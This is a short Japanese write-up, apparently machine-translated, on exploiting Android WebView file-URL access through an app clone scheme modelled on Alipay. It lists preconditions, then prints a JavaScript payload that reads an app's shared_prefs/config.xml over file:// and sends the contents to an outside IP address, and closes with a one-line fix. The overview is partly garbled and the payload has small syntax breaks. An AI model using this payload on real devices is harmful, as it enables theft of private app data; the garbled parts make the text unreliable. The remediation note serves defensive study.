支付宝応用クローン2018/01/09


アリペイアプリケーションクローン



クローンを応用して、支付宝の自動お年玉のリンクから話します

プロセスの概要


自動現金入り封筒のリンク URL , APP · URL Scheme · link
ドメイン間 · URL 、 、 , , ·
Fileプロトコル · html WebView · setAllowUniversalAccessFromFileURLs · True File · File , HTTP
攻撃の構想. html , HTTP WebView html

脆弱性の前提

  • 攻撃者は、攻撃されたAPPを外部から呼び出し、ローカルのhtmlファイル(例えば、お年玉のリンクを奪う)
  • をロードするように命令することができる.
  • 攻撃アプリのsetAllowUniversalAccessFromFileURLs値はtrue
  • 攻撃者は、攻撃された携帯電話にhtmlファイルをダウンロードし、Fileプロトコルによってアクセス可能な場所(他の脆弱性を利用して実現可能)
  • に保存する必要がある.

    payload

    
    <script>
    
        var arm ="file:///data/data/com.example.q00412688.myapplication/shared_prefs/config.xml";
        var xmlhttp;
    
        if (window.XMLHttpRequest)
        {
            xmlhttp=new XMLHttpRequest();
        }
    
        xmlhttp.onreadystatechange=function()
        {
            //alert("statusis"+xmlhttp.status);
            if (xmlhttp.readyState==4)
            {
                window.data=xmlhttp.responseText;
                alert(window.data);
                var url ="http://114.115.139.176/getdata.jsp?data="+window.data;
                var xmlhttp2;
    
                if(window.XMLHttpRequest)
                {
                    xmlhttp2=newXMLHttpRequest();
                }
    
                xmlhttp2.onreadystatechange=function()
                {
                    //alert("statusis"+xmlhttp.status);
                    if(xmlhttp2.readyState==4)
                    {
                        alert(xmlhttp2.responseText);
                    }
                }
    
                xmlhttp2.open("GET",url);
                xmlhttp2.send(null);
            }
        }
    
        xmlhttp.open("GET",arm);
        xmlhttp.send(null);
    
    script>
    html>

    修復シナリオ


    setAllowFileAccessFromFileURLsとsetAllowUniversalAccessFromFileURLsの2つのプロパティ表示をFalseに設定します.